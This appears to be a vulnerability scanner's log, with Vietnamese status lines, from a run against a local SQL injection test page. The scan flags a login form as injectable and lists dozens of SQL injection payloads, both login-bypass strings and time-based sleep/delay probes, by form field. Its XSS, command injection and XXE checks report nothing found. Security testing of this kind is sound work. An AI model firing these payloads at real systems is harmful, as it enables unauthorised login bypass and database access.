[TIME] 2025-08-24 23:02:18
[URL] http://localhost/sqli/index.php
[SUMMARY] SQLi
======= SQLi =======
[*] Đang kiểm tra SQL Injection trên: http://localhost/sqli/index.php
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[!] Có thể bị tấn công SQLi với các payloads:
    - txt_uname=' OR '1'='1
    - but_submit=' OR '1'='1
    - txt_uname=" OR "1"="1
    - txt_pwd=" OR "1"="1
    - but_submit=" OR "1"="1
    - but_submit=') OR ('1'='1
    - txt_uname=" OR 1=1 --
    - txt_pwd=" OR 1=1 --
    - but_submit=" OR 1=1 --
    - but_submit=' OR 1=1#
    - txt_uname=" OR 1=1#
    - txt_pwd=" OR 1=1#
    - but_submit=" OR 1=1#
    - but_submit=admin' --
    - txt_uname=1' or '1' = '1
    - but_submit=1' or '1' = '1
    - but_submit=' AND 1=1 --
    - but_submit=' AND 1=2 --
    - txt_uname=" AND 1=1 --
    - txt_pwd=" AND 1=1 --
    - but_submit=" AND 1=1 --
    - txt_uname=" AND 1=2 --
    - txt_pwd=" AND 1=2 --
    - but_submit=" AND 1=2 --
    - but_submit=') AND '1'='1
    - but_submit=') AND '1'='2
    - txt_uname=" OR "" = "
    - txt_pwd=" OR "" = "
    - but_submit=" OR "" = "
    - txt_uname=' OR '' = '
    - but_submit=' OR '' = '
    - but_submit='; WAITFOR DELAY '0:0:5' --
    - but_submit='; SELECT pg_sleep(5)--
    - txt_uname=" OR SLEEP(5) --
    - txt_pwd=" OR SLEEP(5) --
    - but_submit=" OR SLEEP(5) --
    - but_submit=') OR SLEEP(5) --
    - txt_uname=" OR 1=1; SLEEP(5) --
    - txt_pwd=" OR 1=1; SLEEP(5) --
    - but_submit=" OR 1=1; SLEEP(5) --
    - but_submit=admin' OR SLEEP(3)--
    - txt_uname=1); SELECT sleep(5);--
    - txt_pwd=1); SELECT sleep(5);--
    - but_submit=1); SELECT sleep(5);--


======= XSS =======
[*] Đang kiểm tra XSS trên: http://localhost/sqli/index.php
[!] URL không chứa tham số. Đang thử tìm form để kiểm tra...
[✓] Không phát hiện lỗ hổng XSS.



======= CMDi =======
[*] Đang kiểm tra Command Injection trên: http://localhost/sqli/index.php
[✓] Không phát hiện lỗ hổng CMDi.


======= XXE =======
[*] Đang kiểm tra XXE trên: http://localhost/sqli/index.php
[!] Form không có trường file upload.

